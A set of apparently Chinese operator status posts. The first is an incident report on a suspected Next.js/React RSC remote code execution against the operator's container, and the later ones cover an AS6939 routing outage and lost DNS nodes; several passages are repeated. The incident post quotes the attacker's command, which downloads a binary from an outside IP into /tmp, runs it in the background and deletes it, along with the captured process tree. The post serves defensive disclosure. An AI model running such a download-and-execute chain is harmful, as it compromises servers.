今日晚间,我们 STE Network 在阿里云的边缘节点由阿里云Agent检测到一次疑似 RCE 攻击行为。
—
根据阿里云 Agent 的告警与我们的初步分析,攻击特征高度疑似与近期公开的
Next.js / React RSC 远程代码执行漏洞(CVE-2025-55182 / CVE-2025-66478)
相关,但我们仍在进行进一步核实,因此暂不做最终定论
——
流程分析:
攻击者通过 Next.js 的服务器函数接口向系统投递并执行了恶意可执行文件,其利用链如下
/bin/sh -c wget http://45.76.xx.xx/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & wait ; \
rm -f /tmp/vim
—
由阿里云Agent捕获的进程链如下
containerd-shim
└─ node yarn start-docker
└─ node npm-run-all start-server
└─ next-server v15.0.4
└─ /bin/sh -c wget http://45.76.xx.xx/vim
—
该命令链表明攻击者已成功在 Next.js 运行环境内部执行系统命令,确认存在实际的命令执行行为
——
当前攻击发生在应用容器内部,说明攻击链能够突破Web层并触达系统命令执行路径
-
我们已在第一时间隔离受影响节点,并进行镜像替换与版本升级
-
尚未发现横向移动或进一步扩大的迹象
——
根据目前社区和安全圈公开的技术细节,Next.js / React RSC 相关漏洞利用门槛较低,风险等级极高
-
建议所有使用 Next.js / React 的开发者与平台运营者尽快升级到官方最新版本
—
根据阿里云 Agent 的告警与我们的初步分析,攻击特征高度疑似与近期公开的
Next.js / React RSC 远程代码执行漏洞(CVE-2025-55182 / CVE-2025-66478)
相关,但我们仍在进行进一步核实,因此暂不做最终定论
——
流程分析:
攻击者通过 Next.js 的服务器函数接口向系统投递并执行了恶意可执行文件,其利用链如下
/bin/sh -c wget http://45.76.xx.xx/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & wait ; \
rm -f /tmp/vim
—
由阿里云Agent捕获的进程链如下
containerd-shim
└─ node yarn start-docker
└─ node npm-run-all start-server
└─ next-server v15.0.4
└─ /bin/sh -c wget http://45.76.xx.xx/vim
—
该命令链表明攻击者已成功在 Next.js 运行环境内部执行系统命令,确认存在实际的命令执行行为
——
当前攻击发生在应用容器内部,说明攻击链能够突破Web层并触达系统命令执行路径
-
我们已在第一时间隔离受影响节点,并进行镜像替换与版本升级
-
尚未发现横向移动或进一步扩大的迹象
——
根据目前社区和安全圈公开的技术细节,Next.js / React RSC 相关漏洞利用门槛较低,风险等级极高
-
建议所有使用 Next.js / React 的开发者与平台运营者尽快升级到官方最新版本
🤯4
快报,(影响范围:除CN-Mainland以外的地区)
---
IPv6 Tier1,IPv4 Tier2 运营商AS6939 (Hurricane Electric)
的骨干网出现一些问题,导致你服某些境外节点使用IPv4单线6939作为上游的服务器/节点的路由的会出现不可达
---
但是因为IPv6由于AS174和AS6939两家的历史问题,我们没有单线6939的IPv6,我的服务商也没有单线6939,因此IPv6服务肯定正常
不是我的问题,也不是你的问题,等待修复好了
---
我们和AS6939的PEER会话正常收到对方的IP Route表,但所有发来的前缀皆不可达
---
IPv6 Tier1,IPv4 Tier2 运营商AS6939 (Hurricane Electric)
的骨干网出现一些问题,导致你服某些境外节点使用IPv4单线6939作为上游的服务器/节点的路由的会出现不可达
---
但是因为IPv6由于AS174和AS6939两家的历史问题,我们没有单线6939的IPv6,我的服务商也没有单线6939,因此IPv6服务肯定正常
不是我的问题,也不是你的问题,等待修复好了
---
我们和AS6939的PEER会话正常收到对方的IP Route表,但所有发来的前缀皆不可达
慢报,等级[INFO]:
我们负责运营和维护的 why the fast dns (wtfdns.com) 由于上游打架导致设施拔线
我们失去了HK和DE节点,所以Anycast DNS服务*的亚洲延迟会上涨,欧洲还有荷兰在线,所以几乎无影响
*影响范围:2602:f9f6::,2a10:ccc0:ccc0::,2a06:de00:de00::
Edit:空路由问题已经解决但是延迟解决不了,等死
权威DNS由于已经迁移所以无任何影响
我们负责运营和维护的 why the fast dns (wtfdns.com) 由于上游打架导致设施拔线
我们失去了HK和DE节点,所以Anycast DNS服务*的亚洲延迟会上涨,欧洲还有荷兰在线,所以几乎无影响
*影响范围:2602:f9f6::,2a10:ccc0:ccc0::,2a06:de00:de00::
Edit:空路由问题已经解决但是延迟解决不了,等死
权威DNS由于已经迁移所以无任何影响